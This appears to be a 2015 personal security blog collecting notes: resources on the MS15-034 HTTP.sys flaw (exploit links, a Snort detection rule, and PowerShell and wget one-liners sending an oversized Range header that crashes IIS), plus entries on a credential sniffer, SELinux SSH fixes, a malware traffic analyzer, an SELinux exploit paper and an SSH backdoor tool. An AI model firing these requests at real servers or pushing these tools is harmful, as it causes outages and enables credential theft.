Apr 15, 2015

Resource for MS15-034 (HTTP.sys Exploit)

Microsoft Link: https://technet.microsoft.com/library/security/ms15-034
Metasploit: https://github.com/rapid7/metasploit-framework/pull/5150
DoS script in C language:
- http://www.exploit-db.com/exploits/36773/
- https://ghostbin.com/paste/semkg
DoS script in Python:
- http://pastebin.com/raw.php?i=ypURDPc4 
- http://pastebin.com/wWGFFZpG
Dos with telnet: https://twitter.com/NexusFandom/status/588254994203303937/photo/1
DoS with wget: https://twitter.com/w3bd3vil/status/588339547898941440
Some article: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/
Plugin of IDAPro for diff: https://github.com/joxeankoret/diaphora
Shodan: https://www.shodan.io/search?query=IIS
Discussion:  https://github.com/rapid7/metasploit-framework/pull/5150
Memory Leak: https://www.cloudshark.org/captures/0132eb74ecd3

List service that use HTTP.sys: netsh http show iplisten
 Snort Rule for detect: (https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583)
 alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)

Nmap script: https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse

powershell -com {$wr=[Net.WebRequest]::Create( 'http://[ipaddress]/iisstart.htm');$wr.AddRange('bytes' ,0,18446744073709551615);$wr.GetResponse();$wr.close()}


Develop from MS15-034(IIS Killer by Sam): https://samsclass.info/123/proj14/iis-killer.htm

Masscan: http://blog.erratasec.com/2015/04/masscanning-for-ms15-034.html

Exploit in another service by Francisco Falcon (@fdfalcon)

From Youtube(@Matthew Phillips): (https://www.youtube.com/watch?v=BlBXREzsytc&feature=youtu.be)
Make sure you request a valid resource, I found pointing at / didn't work.

wget --header="Range: bytes=18-18446744073709551615"
wget --header="Range: bytes=18-18446744073709551615"

Apr 14, 2015

Conference:: BSides 2015

Link:: http://www.irongeek.com/i.php?page=videos/bsidesnashville2015/mainlist 

Download: https://archive.org/details/BSidesNashville2015

Tools: net-creds - Sniffs sensitive data from interface or pcap

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
  • Kerberos
Download:: https://github.com/DanMcInerney/net-creds

Apr 2, 2015

Howto: Setup SSH use another port(!22) with SELinux

List usage port of service
/usr/sbin/semanage port -l

Add port 1234 for ssh service
/usr/sbin/semanage port -a -t ssh_port_t -p tcp 1234 

Howto: Solve SSH + PAM_Radius problem

I found the log say that

"Apr  2 14:38:10 localhost audispd: node=localhost.localdomain type=AVC msg=audit
(1427960289.654:338076): avc:  denied  { name_bind } for  pid=3146 comm=”sshd” s
rc=32766 scontext=unconfined_u:system_r:sshd_t:s0-s0:c0.c1023 tcontext=system_u:
object_r:port_t:s0 tclass=udp_socket"

So this is the ways to solve this problem

1. Create policy "sshd-radius.te" file
policy_module(sshd-radius, 1.0)
type sshd_t;
2. Compile it
# make -f /usr/share/selinux/devel/Makefile

3. Install it
# semodule -i sshd-radius.pp

Source:: https://bugzilla.redhat.com/show_bug.cgi?id=647043

Mar 30, 2015

Tools: Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes handy when analyzing how certain malware species try to communicate with the outside world.

Malcom can help you:
  • detect central command and control (C&C) servers
  • understand peer-to-peer networks
  • observe DNS fast-flux infrastructures
  • quickly determine if a network artifact is 'known-bad'
The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.

Source:: https://github.com/tomchop/malcom

Tools: Troubleshooter - Exploit SELinux (Setroubleshoot)

The revenge of GingerBreak

Abstract: This paper demonstrates vulnerabilities within the SELinux framework as well as shortcomings in the type enforcement setup. I will show how to deconstruct a SELinux setup with some simple 80's style exploit techniques. While reading this paper, I recommend listening to this music from the year of morrisworm.
When in 2012 the SELinux developers analyzed the behaivior of an exploit that was not designed to run on a SELinux system at page 32 of these slides - it triggered a review-selector for SELinux and I put it to the list of my audit targets. Not surprisingly, GingerBreak lost that "competition", just because it was not made for it. Using my QUANTUM AUDIT techniques I was now able to have a deeper look into SELinux itself to see whether the claims that were made really hold.

Source:: https://github.com/stealth/troubleshooter


Tools: Paramiko - Python SSH Backdoor

SSH Backdoor using Paramiko

Source:: https://github.com/joridos/custom-ssh-backdoor